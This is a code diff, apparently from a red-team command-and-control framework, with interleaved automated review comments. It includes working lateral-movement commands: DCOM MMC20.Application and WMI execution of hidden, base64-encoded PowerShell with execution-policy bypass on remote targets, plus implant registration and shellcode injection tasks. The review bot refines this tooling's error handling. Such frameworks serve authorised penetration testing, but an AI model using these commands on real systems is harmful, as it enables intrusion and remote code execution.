diff --git a/C2Server.py b/C2Server.py index 7fc8a69..d4fb38a 100644 --- a/C2Server.py +++ b/C2Server.py @@ -50,11 +50,8 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler): QuickCommandURI = select_item("QuickCommand", "C2Server") s.server_version = ServerHeader s.sys_version = "" - if s.cookieHeader: - r = "" - else: + if not s.cookieHeader: s.cookieHeader = "NONE" - # class Tasks() # implant gets a new task new_task = newTask(s.path) @@ -139,7 +136,6 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler): s.send_header("Content-type", "application/x-msdownload") s.end_headers() s.wfile.write(content) - # class Implant() # register new implant elif new_implant_url in s.path and s.cookieHeader.startswith("SessionID"): implant_type = "Normal" @@ -264,7 +260,6 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler): print ("Task %s (%s) returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, task_owner, implantID, Domain, User, Hostname,now.strftime("%m/%d/%Y %H:%M:%S"))) else: print ("Task %s returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, implantID, Domain, User, Hostname,now.strftime("%m/%d/%Y %H:%M:%S"))) - #print decCookie,Colours.END outputParsed = re.sub(r'123456(.+?)654321', '', rawoutput) outputParsed = outputParsed.rstrip() @@ -283,7 +278,6 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler): except Exception as e: update_task(taskId, "Screenshot not captured, the screen could be locked or this user does not have access to the screen!") print ("Screenshot not captured, the screen could be locked or this user does not have access to the screen!") - # What should this be now? elif (executedCmd.lower().startswith("$shellcode64")) or (executedCmd.lower().startswith("$shellcode64")): update_task(taskId, "Upload shellcode complete") print ("Upload shellcode complete") 
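Review bot: In the hunk at `@@ -283,7 +278,6 @@`, the `elif` tests `executedCmd.lower().startswith("$shellcode64")` on both sides of the `or`, so the second operand can never change the result. The deleted `# What should this be now?` sat directly above that line and appears to have been the only marker that the condition was unresolved. Either collapse it to one test, `elif executedCmd.lower().startswith("$shellcode64"):`, or keep a comment such as `# TODO: second prefix still undecided` until the intended value is settled. The surrounding if/elif chain starts and ends outside the hunk.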
@@ -360,9 +354,9 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler): print (Colours.GREEN) print (outputParsed + Colours.END) except Exception as e: - e = "" # print e # traceback.print_exc() + pass finally: s.send_response(200) @@ -384,7 +378,6 @@ if __name__ == '__main__': print (Colours.GREEN + logopic) print (Colours.END + "") - # KeyFile = None, CertFile = None, ClientCertCAs = None if os.path.isfile(Database): print ("Using existing database / project" + Colours.GREEN) C2 = get_c2server_all() @@ -481,7 +474,6 @@ if __name__ == '__main__': httpd.socket = ssl.wrap_socket (httpd.socket, keyfile="%sposh.key" % ROOTDIR, certfile="%sposh.crt" % ROOTDIR, server_side=True, ssl_version=ssl.PROTOCOL_TLSv1) else: raise ValueError("Cannot find the certificate files") - #logging.basicConfig(level=logging.WARNING) # DEBUG,INFO,WARNING,ERROR,CRITICAL try: httpd.serve_forever() diff --git a/ImplantHandler.py b/ImplantHandler.py index c1b0b20..93e890a 100644 --- a/ImplantHandler.py +++ b/ImplantHandler.py @@ -148,7 +148,7 @@ def startup(user, printhelp = ""): except Exception as e: print ("cls") print (chr(27) + "[2J") - print (Colours.GREEN + "") + print (Colours.GREEN) print (logopic) print ("") diff --git a/PSHandler.py b/PSHandler.py index dd7a7a0..45b2f71 100644 --- a/PSHandler.py +++ b/PSHandler.py @@ -181,7 +181,6 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre new_task(cmd, user, randomuri) # wmi lateral movement - elif "invoke-wmiproxypayload" in command.lower(): check_module_loaded("Invoke-WMIExec.ps1", randomuri, user) if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))): 
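Review bot: In the C2Server.py hunk at `@@ -360,9 +354,9 @@`, the `except Exception as e:` branch still discards every error. Swapping `e = ""` for `pass` leaves `e` unused, and the `finally` answers 200 whether or not the body succeeded. A failure in the request handling above, which starts outside the hunk, therefore leaves no trace on the server console. Report it in the file's existing print style, for example `print ("Error processing task output: %s" % e)`. If the `traceback` module is imported in this file (the commented-out call suggests so), re-enabling `traceback.print_exc()` would do the same job. The two commented-out lines should then go as well, as the rest of this commit removes such leftovers.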
@@ -218,7 +217,6 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre new_task(cmd, user, randomuri) # dcom lateral movement - elif "invoke-dcomproxypayload" in command.lower(): if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))): with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read() @@ -226,7 +224,7 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre params = params.sub("", command) p = re.compile(r'(?<=-target.).*') target = re.search(p, command).group() - pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c %s\",\"7\")" % (target,payload) + pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\\Windows\\System32\\cmd.exe\",$null,\"/c %s\",\"7\")" % (target,payload) new_task(pscommand, user, randomuri) else: startup(user, "Need to run createproxypayload first") 
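Review bot: In the hunk at `@@ -226,7 +224,7 @@`, `target = re.search(p, command).group()` is unguarded, so a command with no `-target` argument raises AttributeError on `None`. The missing-payload case, by contrast, is reported through `startup(user, ...)`. The same line appears in the hunks at `@@ -237,7 +235,7 @@` and `@@ -250,11 +248,10 @@`. Test the match first, `m = p.search(command)`, and route `m is None` to the same `startup(user, ...)` message path before formatting `pscommand`. In the `-237` hunk, `p` is also first bound to the open file and then rebound to the compiled pattern, so a separate name such as `target_re` would read more clearly. The `handle_ps_command` body continues outside all three hunks, so whether a caller catches the exception is not visible here.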
@@ -237,7 +235,7 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read() p = re.compile(r'(?<=-target.).*') target = re.search(p, command).group() - pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload) + pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\\Windows\\System32\\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload) new_task(pscommand, user, randomuri) else: startup(user, "Need to run createdaisypayload first") @@ -250,11 +248,10 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre payload = newPayload.CreateRawBase() p = re.compile(r'(?<=-target.).*') target = re.search(p, command).group() - pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload) + pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\\Windows\\System32\\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload) new_task(pscommand, user, randomuri) # runas payloads - elif "invoke-runasdaisypayload" in command.lower(): daisyname = raw_input("Name required: ") if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))): 
diff --git a/SharpHandler.py b/SharpHandler.py index 9829bab..9f2b839 100644 --- a/SharpHandler.py +++ b/SharpHandler.py @@ -15,7 +15,7 @@ def handle_sharp_command(command, user, randomuri, startup): except Exception as e: print ("Error loading Stage2-Core.exe: %s" % e) - # alias mapping + # alias mapping for alias in cs_alias: if alias[0] == command.lower()[:len(command.rstrip())]: command = alias[1] @@ -75,7 +75,6 @@ def handle_sharp_command(command, user, randomuri, startup): try: shellcodefile = load_file(path) if shellcodefile != None: - arch = "64" new_task("run-exe Core.Program Core Inject-Shellcode %s%s" % (base64.b64encode(shellcodefile),params), user, randomuri) except Exception as e: print ("Error loading file: %s" % e)